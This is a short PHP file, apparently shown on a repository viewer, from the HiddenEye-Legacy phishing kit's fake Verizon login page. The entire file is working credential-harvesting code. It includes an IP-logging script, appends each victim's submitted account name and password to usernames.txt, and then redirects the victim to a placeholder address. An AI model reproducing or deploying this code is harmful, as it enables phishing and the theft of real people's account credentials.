HiddenEye-Legacy/WebPages/verizon/login.php

8 lines
188 B
PHP
Raw Normal View History

2019-04-21 18:15:25 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['IDToken1'] . " Pass: " . $_POST['IDToken2'] . "\n", FILE_APPEND);
header('Location: <CUSTOM> ');
exit();